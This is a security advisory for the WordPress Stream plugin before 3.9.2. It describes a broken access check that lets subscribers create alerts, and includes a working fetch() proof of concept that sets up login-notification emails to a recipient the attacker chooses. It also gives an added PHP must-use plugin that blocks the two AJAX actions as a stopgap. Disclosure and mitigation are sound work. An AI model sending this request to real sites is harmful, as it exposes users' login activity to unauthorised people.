wpexploit | Krzysztof Zając | WPEX-ID:2B506252-6F37-439E-8984-7316D5CCA2E5
Jan 16, 2023 - 12:00 a.m.

Stream < 3.9.2 - Subscriber+ Alert Creation


EPSS: 0.001 (Low), percentile 29.7%

The plugin does not prevent low-privileged users on the site (such as subscribers) from using its alert creation functionality, which may enable them to leak sensitive information.

Step 1: Log in as a subscriber
Step 2: Get a nonce from https://example.com/wp-admin/admin-ajax.php?action=get_new_alert_triggers_notifications
Step 3: Configure the alerts via:

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded"
  },
  "method": "POST",
  "body": "action=save_new_alert&wp_stream_alerts_nonce=XXXX&wp_stream_trigger_author=&wp_stream_trigger_context=users-sessions&wp_stream_trigger_action=login&wp_stream_alert_type=email&wp_stream_alert_status=wp_stream_enabled&wp_stream_email_recipient=recipient%40example.com&wp_stream_email_subject=test",
});
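
For sites that cannot move to 3.9.2 straight away, the missing authorization check can be enforced from outside the plugin. The snippet below is an added example, not Stream's own code or its actual fix: it refuses the two AJAX actions named above unless the caller holds a capability, and logs each refusal. The function name, the constant and the choice of `manage_options` as the gating capability are assumptions.

```php
<?php
/**
 * Added example (not Stream's own code): must-use plugin that refuses the two
 * AJAX actions named in this advisory unless the caller is privileged.
 * Assumption: 'manage_options' is the capability that should gate alert setup.
 */

const STREAM_ALERT_GUARD_CAP = 'manage_options'; // assumed capability

// Hypothetical helper name; runs ahead of the plugin's own AJAX handler.
function stream_alert_guard() {
    if ( current_user_can( STREAM_ALERT_GUARD_CAP ) ) {
        return; // authorised: fall through to the plugin's handler
    }

    // Record who was refused so the attempt shows up in the PHP error log.
    error_log( sprintf(
        'stream-alert-guard: denied action=%s user_id=%d ip=%s',
        isset( $_REQUEST['action'] ) ? sanitize_key( wp_unslash( $_REQUEST['action'] ) ) : '',
        get_current_user_id(),
        isset( $_SERVER['REMOTE_ADDR'] ) ? $_SERVER['REMOTE_ADDR'] : ''
    ) );

    // Sends a JSON error with HTTP 403 and terminates the request.
    wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
}

// wp_ajax_{action} fires for logged-in users. Priority 0 runs before a
// handler registered at the default priority 10 (assumed for the plugin).
foreach ( array( 'get_new_alert_triggers_notifications', 'save_new_alert' ) as $action ) {
    add_action( 'wp_ajax_' . $action, 'stream_alert_guard', 0 );
}
```

Placed in `wp-content/mu-plugins/`, the file loads on every request and cannot be deactivated from the admin UI; remove it once the plugin is upgraded.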
